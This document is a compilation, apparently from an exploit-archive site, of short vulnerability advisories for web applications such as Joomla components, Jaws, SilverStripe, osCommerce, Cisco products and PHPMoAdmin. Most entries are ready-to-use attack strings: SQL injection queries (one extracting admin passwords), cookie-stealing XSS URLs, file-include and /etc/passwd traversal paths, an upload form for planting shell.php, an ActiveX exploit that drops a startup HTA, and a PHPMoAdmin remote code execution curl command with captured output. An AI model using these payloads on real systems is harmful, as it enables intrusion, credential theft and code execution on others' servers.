HireHackking

source: https://www.securityfocus.com/bid/50022/info Jaws is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the Web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. Jaws 0.8.14 is vulnerable; other versions may also be affected. http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI] http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI] http://www.example.com/jaws/libraries/pear/Services/Weather.php?service=[RFI] http://www.example.com/jaws/libraries/pear/SOAP/Transport.php?transport_include=[RFI] http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI]

source: https://www.securityfocus.com/bid/50041/info The 'com_tree' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_tree&Itemid=11&key=-77 uNIOn select 0,version(),2--

source: https://www.securityfocus.com/bid/50039/info GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. POST /goform/AddUser HTTP/1.1 user=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&group=%3Cscript%3Ealert%281337%2 9%3C%2Fscript%3E&enabled=on&password=test&passconf=test&ok=OK

source: https://www.securityfocus.com/bid/50042/info The 'com_br' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=-33 union select 0,1,version(),3

source: https://www.securityfocus.com/bid/50046/info 2Moons is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 2Moons 1.4 is vulnerable; other versions may also be affected. http://www.example.com/2Moons/CombatReport.php?RID=[EV!L] http://www.example.com/2Moons/includes/common.php?UNI=[EV!L] http://www.example.com/2Moons/includes/classes/class.FlyingFleetHandler.php?MissionsPattern[CurrentFleet[fleet_mission]]=[EV!L] http://www.example.com/2Moons/includes/classes/class.FlyingFleetHandler.php?CurrentFleet[fleet_mission]]=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?Lang=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?LANGUAGE=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L] http://www.example.com/2Moons/includes/classes/class.Records.php?File=[EV!L] http://www.example.com/2Moons/includes/pages/ShowTopKB.php?ReportID=[EV!L] http://www.example.com/2Moons/includes/libs/Smarty/Smarty.class.php?file=[EV!L] http://www.example.com/2Moons/includes/pages/adm/ShowModVersionPage.php?File=[EV!L] http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?_smarty_template=[EV!L] http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?file=[EV!L]

source: https://www.securityfocus.com/bid/50043/info The 'com_shop' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_shop&view=details&id=-29 union select 0,1,2,version(),4,5,6,7,8,9,10,11,12

source: https://www.securityfocus.com/bid/50050/info 6KBBS is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 6KBBS 8.0 build 20101201 is vulnerable; other versions may also be affected. http://www.example.com/credits.php?'[XSS] http://www.example.com/forum.php?'[XSS] http://www.example.com/index.php?'[XSS] http://www.example.com/login.php?'[XSS] http://www.example.com/online.php?'[XSS] http://www.example.com/getfiles.php?f=http://xxx&t=js http://www.example.com/admin/portalcollect.php?f=http://xxx&t=js

source: https://www.securityfocus.com/bid/50061/info Contao is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Contao 2.10.1 is vulnerable; other versions may also be affected. http://www.example.com/contao-2.10.1/index.php/teachers.html?"/><script>alert(&#039;xss&#039;)</script> http://www.example.com/contao-2.10.1/index.php/teachers/&#039;"</style></script><script>alert(document.cookie)</script>

source: https://www.securityfocus.com/bid/50063/info SilverStripe is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SilverStripe 2.4.5 is vulnerable; other versions may also be affected. http://www.example.com/SilverStripe-v2.4.5/admin/reports/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/comments/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/4?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/2?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/root?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/3?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/assets/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/1?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/5?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/security/?&#039;"</script><script>alert(document.cookie)</script>

source: https://www.securityfocus.com/bid/50083/info BugFree is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. BugFree 2.1.3 is vulnerable; other versions may also be affected. http://www.example.com/Bug.php?BugID=1&ActionType=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/Report.php?ReportMode=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/ReportLeft.php?ReportMode=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/AdminProjectList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/AdminGroupList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/AdminUserLogList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/50072/info The Sgicatalog component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Sgicatalog 1.0 is vulnerable; other versions may also be affected. http://www.example.com/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]

source: https://www.securityfocus.com/bid/50286/info Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Boonex Dolphin 6.1 is vulnerable; other versions may also be affected. http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) )

source: https://www.securityfocus.com/bid/50295/info Innovate Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound

source: https://www.securityfocus.com/bid/50296/info Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Splunk versions 4.2.2 and prior are vulnerable. http://www.example.com/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened

source: https://www.securityfocus.com/bid/50301/info osCommerce is prone to a remote file upload and a file disclosure vulnerability. The issues occur because the application fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload a file and obtain an arbitrary file's content; other attacks are also possible. The following URL is available for the file disclosure vulnerability: http://www.example.com/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php The following exploit is available for the remote file upload vulnerability: <html><head><title> creloaded - Remote File Upload </title></head> <br><br><u>UPLOAD FILE:</u><br> <form name="file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> <input type="file" name="file_1"><br> <input name="submit" type="submit" value=" Upload " > </form> <br><u>CREATE FILE:</u><br> <form name="new_file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=save" method="post"> FILE NAME:<br> <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; <input name="submit" type="submit" value=" Save " > </form>

source: https://www.securityfocus.com/bid/50298/info Splunk is prone to a remote denial-of-service vulnerability. Exploiting this issue will exhaust system resources and cause the application to crash, denying service to legitimate users. http://www.example.com/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested http://www.example.com/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested https://localhost/en-US/debug/sso

source: https://www.securityfocus.com/bid/50307/info Tine is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Tine 2.0 is vulnerable; other versions may also be affected. http://www.example.com/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cooki e%29;%3C/script%3E

source: https://www.securityfocus.com/bid/50332/info Oracle AutoVue 'AutoVueX.ocx' ActiveX control is prone to a vulnerability caused by an insecure method. Successfully exploiting this issue will allow attackers to create or overwrite arbitrary files on a victim's computer within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Oracle AutoVue 20.0.1 is vulnerable; other versions may also be affected. <!-- Oracle AutoVue AutoVueX ActiveX Control ExportEdaBom Remote Code Execution ProgID: AUTOVUEX.AutoVueXCtrl.1 CLSID: {B6FCC215-D303-11D1-BC6C-0000C078797F} Binary path: C:\PROGRA~1\av\avwin\AutoVueX.ocx Safe for initialization (registry): true Safe for scripting (registry): true rgod --> <!-- saved from url=(0014)about:internet --> <html> <object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' width=640 & height=480 /> <param name=SRC value="PADS_Evaluation_board.pcb"></param> </object> <script defer="defer"> var sh = "<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>"; for (i=0; i<6666; i++) { obj.ExportEdaBom("../../../../../../../../../../../Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta","aaaa",true,sh); } window.location.href = window.location.href; </script>

source: https://www.securityfocus.com/bid/50339/info e107 is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application. e107 0.7.24 is vulnerable; other versions may also be affected. http://www.example.com/e107_config.php?cmd=id

###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # PHPMoAdmin Unauthorized Remote Code Execution (0-Day) # Website : http://www.phpmoadmin.com/ # Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio # Release dates : March 3, 2015 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ PHPMoAdmin is a MongoDB administration tool for PHP built on a stripped-down version of the Vork high-performance framework. [+] Exploit ============================================================ Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ============================================================ PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 34 object=1;system('id;ls -lha');exit HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 16:57:40 GMT Server: Apache/2.4.7 (Ubuntu) Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 223 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html uid=33(www-data) gid=33(www-data) groups=33(www-data) total 116K drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 . drwxr-xr-x 6 root root 4.0K Mar 3 16:17 .. -rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php [+] Vulnerability Analysis ============================================================ Filename: moadmin.php 1. create new moadminComponent object 1977: $mo = new moadminComponent; 2. if the http-post parameter 'object' is set 738: class moadminComponent { ... 762: public function __construct() { ... 786: if (isset($_POST['object'])) { 787: if (self::$model->saveObject($_GET['collection'], $_POST['object'])) { ... 3. evaluate the value of 'object' as PHP code 692: public function saveObject($collection, $obj) { 693: eval('$obj=' . $obj . ';'); //cast from string to array

source: https://www.securityfocus.com/bid/50344/info InverseFlow is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. InverseFlow 2.4 is vulnerable; other versions may also be affected. http://www.example.com/inver/inverseflow/ticketview.php?email= [XSS] http://www.example.com/inver/inverseflow/ticketview.php?email=&id=[XSS] http://www.example.com/inver/inverseflow/login.php?redirect=[XSS]

source: https://www.securityfocus.com/bid/50350/info Alsbtain Bulletin is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Alsbtain Bulletin 1.5 and 1.6 are vulnerable; other versions may also be affected. http://www.example.com/index.php?style=[LFI]%00 http://www.example.com/index.php?act=[LFI]%00

source: https://www.securityfocus.com/bid/50364/info vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. http://www.example.com/modules/mobile/index.php?_operation="><script>alert(1)</script> http://www.example.com/modules/mobile/index.php?_operation=listModuleRecords&module=Services&search="><script>alert(1)</script>

source: https://www.securityfocus.com/bid/50381/info XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect XAMPP 1.7.4 for Windows and prior. http://www.example.com/xampp/ming.php?text=[xss] http://www.example.com/xampp/cds.php/[xss]

source: https://www.securityfocus.com/bid/50372/info Multiple Cisco products are prone to a directory-traversal vulnerability. Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks. This issue is tracked by Cisco BugID CSCts44049 and CSCth09343. The following products are affected: Cisco Unified IP Interactive Voice Response Cisco Unified Contact Center Express Cisco Unified Communications Manager http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml